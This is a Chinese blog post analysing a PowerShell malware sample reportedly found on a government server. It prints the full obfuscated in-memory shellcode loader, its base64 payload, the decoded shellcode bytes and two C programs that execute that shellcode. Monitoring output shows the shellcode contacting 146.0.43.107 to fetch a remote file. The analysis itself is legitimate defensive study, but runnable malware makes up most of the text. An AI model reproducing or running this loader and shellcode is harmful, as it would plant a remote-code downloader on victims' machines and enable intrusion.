[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析

本文链接网址:http://blog.csdn.net/qq1084283172/article/details/45690529

一、事件回放

网络管理员在服务器上通过网络监控软件检测到,有程序在不断向外发包,并且ip地址显示国外的区域,经过相关安全工程师的分析和定位,最确定是微软操作系统上的Power Shell程序出现异常。发现的这个Power Shell程序和微软操作系统上的Power Shell程序不同,出现异常的这个Power Shell会不断的向外发包。经过该安全工程师的分析和反编译程序,最终得到了下面这段关键的代码,其中黄色部分的代码是最为关键的,后面会对这段代码进行解释和分析:

function eioVqZzdV {

     Param ($eoSKcVTjfxS, $p0d9j)        

     $f4Al9fb6 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

    

     return $f4Al9fb6.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($f4Al9fb6.GetMethod('GetModuleHandle')).Invoke($null, @($eoSKcVTjfxS)))), $p0d9j))

}


function mGIgrD {

     Param (

         [Parameter(Position = 0, Mandatory = $True)] [Type[]] $ejQ7pbH8K,

         [Parameter(Position = 1)] [Type] $za4NhlFE = [Void]

     )

     $lqSy6La = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

     $lqSy6La.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $ejQ7pbH8K).SetImplementationFlags('Runtime, Managed')

     $lqSy6La.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $za4NhlFE, $ejQ7pbH8K).SetImplementationFlags('Runtime, Managed')

    

     return $lqSy6La.CreateType()

}


[Byte[]]$umdAM8XBH = [System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi

1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29

tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA

Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9

XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN

DMuMTA3AA==") 


$ro8d50FQZ0 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll VirtualAlloc), (mGIgrD @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $umdAM8XBH.Length,0x3000, 0x40)

[System.Runtime.InteropServices.Marshal]::Copy($umdAM8XBH, 0, $ro8d50FQZ0, $umdAM8XBH.length)


$mLkBWmZ3 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll CreateThread), (mGIgrD @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$ro8d50FQZ0,[IntPtr]::Zero,0,[IntPtr]::Zero)

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll WaitForSingleObject), (mGIgrD @([IntPtr], [Int32]))).Invoke($mLkBWmZ3,0xffffffff| Out-Null


二、对反编译关键代码的注释

//Base64编码的字符串数组$umdAM8XBH

[Byte[]]$umdAM8XBH =[System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi

1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29

tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA

Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9

XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN

DMuMTA3AA==")

        

//调用kernel32.dll库的函数VirtualAlloc在进程堆上分配0x3000大小的内存空间$ro8d50FQZ0保存申请内存空间的地址

$ro8d50FQZ0 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll VirtualAlloc), (mGIgrD @([IntPtr], [UInt32], [UInt32],[UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $umdAM8XBH.Length,0x3000, 0x40)

 

//调用函数Copy从数组$umdAM8XBH中拷贝字符串到新申请的内存空间$ro8d50FQZ0

[System.Runtime.InteropServices.Marshal]::Copy($umdAM8XBH, 0, $ro8d50FQZ0, $umdAM8XBH.length)

 

//调用kernel32.dll库中函数CreateThread创建线程并且线程的回调函数的地址为数组$ro8d50FQZ0的字符串地址

$mLkBWmZ3 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll CreateThread), (mGIgrD @([IntPtr], [UInt32], [IntPtr],[IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$ro8d50FQZ0,[IntPtr]::Zero,0,[IntPtr]::Zero)

 

//调用kernel32.dll库中的函数WaitForSingleObject等待线程的创建成功

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll WaitForSingleObject), (mGIgrD @([IntPtr],[Int32]))).Invoke($mLkBWmZ3,0xffffffff| Out-Null

 

二、黄色部分Base64字符串的解码

//很明显数组$umdAM8XBH中的字符是ShellCode代码但是需要先Base64解码:

[Byte[]]$umdAM8XBH =[System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi

1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29

tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA

Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9

XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN

DMuMTA3AA==")

 

黄色部分的字符串的解码

Base64编码字符串在线解码的网址:http://www1.tc711.com/tool/BASE64.htm

1.Base64字符串解码成字符串--显然这种解码方式是不对的

[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析_第1张图片

2.其实这段Base64加密的编码解密出来是一段ShellCode也就是一段可执行代码不是一个Http的发送包

char shellCode[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89"
"\xe5\x31\xd2\x64\x8b\x52\x30\x8b" 
"\x52\x0c\x8b\x52\x14\x8b\x72\x28" 
"\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1" 
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" 
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0" 
"\x8b\x40\x78\x85\xc0\x74\x4a\x01" 
"\xd0\x50\x8b\x48\x18\x8b\x58\x20" 
"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" 
"\x01\xd6\x31\xff\x31\xc0\xac\xc1" 
"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" 
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2" 
"\x58\x8b\x58\x24\x01\xd3\x66\x8b" 
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" 
"\x04\x8b\x01\xd0\x89\x44\x24\x24" 
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0" 
"\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" 
"\x68\x6e\x65\x74\x00\x68\x77\x69" 
"\x6e\x69\x54\x68\x4c\x77\x26\x07" 
"\xff\xd5\xe8\x80\x00\x00\x00\x4d" 
"\x6f\x7a\x69\x6c\x6c\x61\x2f\x35" 
"\x2e\x30\x20\x28\x63\x6f\x6d\x70" 
"\x61\x74\x69\x62\x6c\x65\x3b\x20" 
"\x4d\x53\x49\x45\x20\x31\x30\x2e" 
"\x30\x3b\x20\x57\x69\x6e\x64\x6f" 
"\x77\x73\x20\x4e\x54\x20\x36\x2e" 
"\x32\x3b\x20\x57\x4f\x57\x36\x34" 
"\x3b\x20\x54\x72\x69\x64\x65\x6e" 
"\x74\x2f\x36\x2e\x30\x3b\x20\x54" 
"\x6f\x75\x63\x68\x3b\x20\x4d\x41" 
"\x53\x50\x4a\x53\x29\x00\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x00\x59" 
"\x31\xff\x57\x57\x57\x57\x51\x68" 
"\x3a\x56\x79\xa7\xff\xd5\xeb\x79" 
"\x5b\x31\xc9\x51\x51\x6a\x03\x51" 
"\x51\x68\x50\x00\x00\x00\x53\x50" 
"\x68\x57\x89\x9f\xc6\xff\xd5\xeb" 
"\x62\x59\x31\xd2\x52\x68\x00\x02" 
"\x60\x84\x52\x52\x52\x51\x52\x50" 
"\x68\xeb\x55\x2e\x3b\xff\xd5\x89" 
"\xc6\x31\xff\x57\x57\x57\x57\x56" 
"\x68\x2d\x06\x18\x7b\xff\xd5\x85" 
"\xc0\x74\x44\x31\xff\x85\xf6\x74" 
"\x04\x89\xf9\xeb\x09\x68\xaa\xc5" 
"\xe2\x5d\xff\xd5\x89\xc1\x68\x45" 
"\x21\x5e\x31\xff\xd5\x31\xff\x57" 
"\x6a\x07\x51\x56\x50\x68\xb7\x57" 
"\xe0\x0b\xff\xd5\xbf\x00\x2f\x00" 
"\x00\x39\xc7\x74\xbc\x31\xff\xeb" 
"\x15\xeb\x49\xe8\x99\xff\xff\xff" 
"\x2f\x68\x66\x59\x6e\x00\x00\x68" 
"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40" 
"\x68\x00\x10\x00\x00\x68\x00\x00" 
"\x40\x00\x57\x68\x58\xa4\x53\xe5" 
"\xff\xd5\x93\x53\x53\x89\xe7\x57" 
"\x68\x00\x20\x00\x00\x53\x56\x68" 
"\x12\x96\x89\xe2\xff\xd5\x85\xc0" 
"\x74\xcd\x8b\x07\x01\xc3\x85\xc0" 
"\x75\xe5\x58\xc3\xe8\x37\xff\xff" 
"\xff\x31\x34\x36\x2e\x30\x2e\x34" 
"\x33\x2e\x31\x30\x37\x00 ";

三、ShellCode代码行为的分析

1.编写测试测试程序,对ShellCode的行为进行分析

ShellCode测试程序1--TestCode:

// TestCode.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"


char shellCode[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89"
"\xe5\x31\xd2\x64\x8b\x52\x30\x8b" 
"\x52\x0c\x8b\x52\x14\x8b\x72\x28" 
"\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1" 
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" 
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0" 
"\x8b\x40\x78\x85\xc0\x74\x4a\x01" 
"\xd0\x50\x8b\x48\x18\x8b\x58\x20" 
"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" 
"\x01\xd6\x31\xff\x31\xc0\xac\xc1" 
"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" 
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2" 
"\x58\x8b\x58\x24\x01\xd3\x66\x8b" 
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" 
"\x04\x8b\x01\xd0\x89\x44\x24\x24" 
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0" 
"\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" 
"\x68\x6e\x65\x74\x00\x68\x77\x69" 
"\x6e\x69\x54\x68\x4c\x77\x26\x07" 
"\xff\xd5\xe8\x80\x00\x00\x00\x4d" 
"\x6f\x7a\x69\x6c\x6c\x61\x2f\x35" 
"\x2e\x30\x20\x28\x63\x6f\x6d\x70" 
"\x61\x74\x69\x62\x6c\x65\x3b\x20" 
"\x4d\x53\x49\x45\x20\x31\x30\x2e" 
"\x30\x3b\x20\x57\x69\x6e\x64\x6f" 
"\x77\x73\x20\x4e\x54\x20\x36\x2e" 
"\x32\x3b\x20\x57\x4f\x57\x36\x34" 
"\x3b\x20\x54\x72\x69\x64\x65\x6e" 
"\x74\x2f\x36\x2e\x30\x3b\x20\x54" 
"\x6f\x75\x63\x68\x3b\x20\x4d\x41" 
"\x53\x50\x4a\x53\x29\x00\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x00\x59" 
"\x31\xff\x57\x57\x57\x57\x51\x68" 
"\x3a\x56\x79\xa7\xff\xd5\xeb\x79" 
"\x5b\x31\xc9\x51\x51\x6a\x03\x51" 
"\x51\x68\x50\x00\x00\x00\x53\x50" 
"\x68\x57\x89\x9f\xc6\xff\xd5\xeb" 
"\x62\x59\x31\xd2\x52\x68\x00\x02" 
"\x60\x84\x52\x52\x52\x51\x52\x50" 
"\x68\xeb\x55\x2e\x3b\xff\xd5\x89" 
"\xc6\x31\xff\x57\x57\x57\x57\x56" 
"\x68\x2d\x06\x18\x7b\xff\xd5\x85" 
"\xc0\x74\x44\x31\xff\x85\xf6\x74" 
"\x04\x89\xf9\xeb\x09\x68\xaa\xc5" 
"\xe2\x5d\xff\xd5\x89\xc1\x68\x45" 
"\x21\x5e\x31\xff\xd5\x31\xff\x57" 
"\x6a\x07\x51\x56\x50\x68\xb7\x57" 
"\xe0\x0b\xff\xd5\xbf\x00\x2f\x00" 
"\x00\x39\xc7\x74\xbc\x31\xff\xeb" 
"\x15\xeb\x49\xe8\x99\xff\xff\xff" 
"\x2f\x68\x66\x59\x6e\x00\x00\x68" 
"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40" 
"\x68\x00\x10\x00\x00\x68\x00\x00" 
"\x40\x00\x57\x68\x58\xa4\x53\xe5" 
"\xff\xd5\x93\x53\x53\x89\xe7\x57" 
"\x68\x00\x20\x00\x00\x53\x56\x68" 
"\x12\x96\x89\xe2\xff\xd5\x85\xc0" 
"\x74\xcd\x8b\x07\x01\xc3\x85\xc0" 
"\x75\xe5\x58\xc3\xe8\x37\xff\xff" 
"\xff\x31\x34\x36\x2e\x30\x2e\x34" 
"\x33\x2e\x31\x30\x37\x00 ";

int main(int argc, char* argv[])
{
	__asm
	{
		lea eax, shellCode
		push eax
		ret
	}

	return 0;
}

ShellCode测试程序2--TestCode1:

// TestCode1.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>

char shellCode[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89"
"\xe5\x31\xd2\x64\x8b\x52\x30\x8b" 
"\x52\x0c\x8b\x52\x14\x8b\x72\x28" 
"\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1" 
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" 
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0" 
"\x8b\x40\x78\x85\xc0\x74\x4a\x01" 
"\xd0\x50\x8b\x48\x18\x8b\x58\x20" 
"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" 
"\x01\xd6\x31\xff\x31\xc0\xac\xc1" 
"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" 
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2" 
"\x58\x8b\x58\x24\x01\xd3\x66\x8b" 
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" 
"\x04\x8b\x01\xd0\x89\x44\x24\x24" 
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0" 
"\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" 
"\x68\x6e\x65\x74\x00\x68\x77\x69" 
"\x6e\x69\x54\x68\x4c\x77\x26\x07" 
"\xff\xd5\xe8\x80\x00\x00\x00\x4d" 
"\x6f\x7a\x69\x6c\x6c\x61\x2f\x35" 
"\x2e\x30\x20\x28\x63\x6f\x6d\x70" 
"\x61\x74\x69\x62\x6c\x65\x3b\x20" 
"\x4d\x53\x49\x45\x20\x31\x30\x2e" 
"\x30\x3b\x20\x57\x69\x6e\x64\x6f" 
"\x77\x73\x20\x4e\x54\x20\x36\x2e" 
"\x32\x3b\x20\x57\x4f\x57\x36\x34" 
"\x3b\x20\x54\x72\x69\x64\x65\x6e" 
"\x74\x2f\x36\x2e\x30\x3b\x20\x54" 
"\x6f\x75\x63\x68\x3b\x20\x4d\x41" 
"\x53\x50\x4a\x53\x29\x00\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x58\x58" 
"\x58\x58\x58\x58\x58\x58\x00\x59" 
"\x31\xff\x57\x57\x57\x57\x51\x68" 
"\x3a\x56\x79\xa7\xff\xd5\xeb\x79" 
"\x5b\x31\xc9\x51\x51\x6a\x03\x51" 
"\x51\x68\x50\x00\x00\x00\x53\x50" 
"\x68\x57\x89\x9f\xc6\xff\xd5\xeb" 
"\x62\x59\x31\xd2\x52\x68\x00\x02" 
"\x60\x84\x52\x52\x52\x51\x52\x50" 
"\x68\xeb\x55\x2e\x3b\xff\xd5\x89" 
"\xc6\x31\xff\x57\x57\x57\x57\x56" 
"\x68\x2d\x06\x18\x7b\xff\xd5\x85" 
"\xc0\x74\x44\x31\xff\x85\xf6\x74" 
"\x04\x89\xf9\xeb\x09\x68\xaa\xc5" 
"\xe2\x5d\xff\xd5\x89\xc1\x68\x45" 
"\x21\x5e\x31\xff\xd5\x31\xff\x57" 
"\x6a\x07\x51\x56\x50\x68\xb7\x57" 
"\xe0\x0b\xff\xd5\xbf\x00\x2f\x00" 
"\x00\x39\xc7\x74\xbc\x31\xff\xeb" 
"\x15\xeb\x49\xe8\x99\xff\xff\xff" 
"\x2f\x68\x66\x59\x6e\x00\x00\x68" 
"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40" 
"\x68\x00\x10\x00\x00\x68\x00\x00" 
"\x40\x00\x57\x68\x58\xa4\x53\xe5" 
"\xff\xd5\x93\x53\x53\x89\xe7\x57" 
"\x68\x00\x20\x00\x00\x53\x56\x68" 
"\x12\x96\x89\xe2\xff\xd5\x85\xc0" 
"\x74\xcd\x8b\x07\x01\xc3\x85\xc0" 
"\x75\xe5\x58\xc3\xe8\x37\xff\xff" 
"\xff\x31\x34\x36\x2e\x30\x2e\x34" 
"\x33\x2e\x31\x30\x37\x00 ";


int main(int argc, char* argv[])
{
	//创建ShellCode的线程
	HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)(int)&shellCode, NULL, 0, NULL);

	//等待线程的创建完成
	WaitForSingleObject(hThread, INFINITE);

	return 0;
}

2.  使用病毒监控软件MyMonitor对ShellCode的行为进行监控,情况如下:

创建文件C:\Documentsand Settings\Administrator\Local Settings\Temporary InternetFiles\Content.IE5\index.dat

创建文件C:\Documentsand Settings\Administrator\Cookies\index.dat

创建文件C:\Documentsand Settings\Administrator\Local Settings\History\ History.IE5\index.dat

创建文件C:\AUTOEXEC.BAT

创建文件C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\b7e3_appcompat.txt

链接外网146.0.43.107:80,远程读取该网站中的文件146.0.43.107/hfYn到本地文件中。


[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析_第2张图片

[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析_第3张图片


3. 使用OD对程序进行动态分析

ShellCode的汇编是经过人工刻意编写的,懒得分析,我想多活几年,只提供部分ShellCode的截图:

[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析_第4张图片

[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析_第5张图片


4.使用金山火眼对样本进行分析

分析结果的网址:

http://fireeye.ijinshan.com/analyse.html?md5=232ddb4b262057145ce0b8930738b7fb&sha1=39ec762b497c51a28acb7c334a123c89ebd944dd&type=1#full 


[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析_第6张图片

[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析_第7张图片

[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析_第8张图片


四、在线病毒扫描对样本的检测结果

病毒检测报告结果的网址:

http://r.virscan.org/report/8cb8acd2f0bce2b3ee34bcffc5657c8d


[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析_第9张图片

[置顶] 针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析_第10张图片


笔记到此为止,欢迎高手拍砖砸死。








你可能感兴趣的:(shell,金山,中国,power,政府,APT攻击)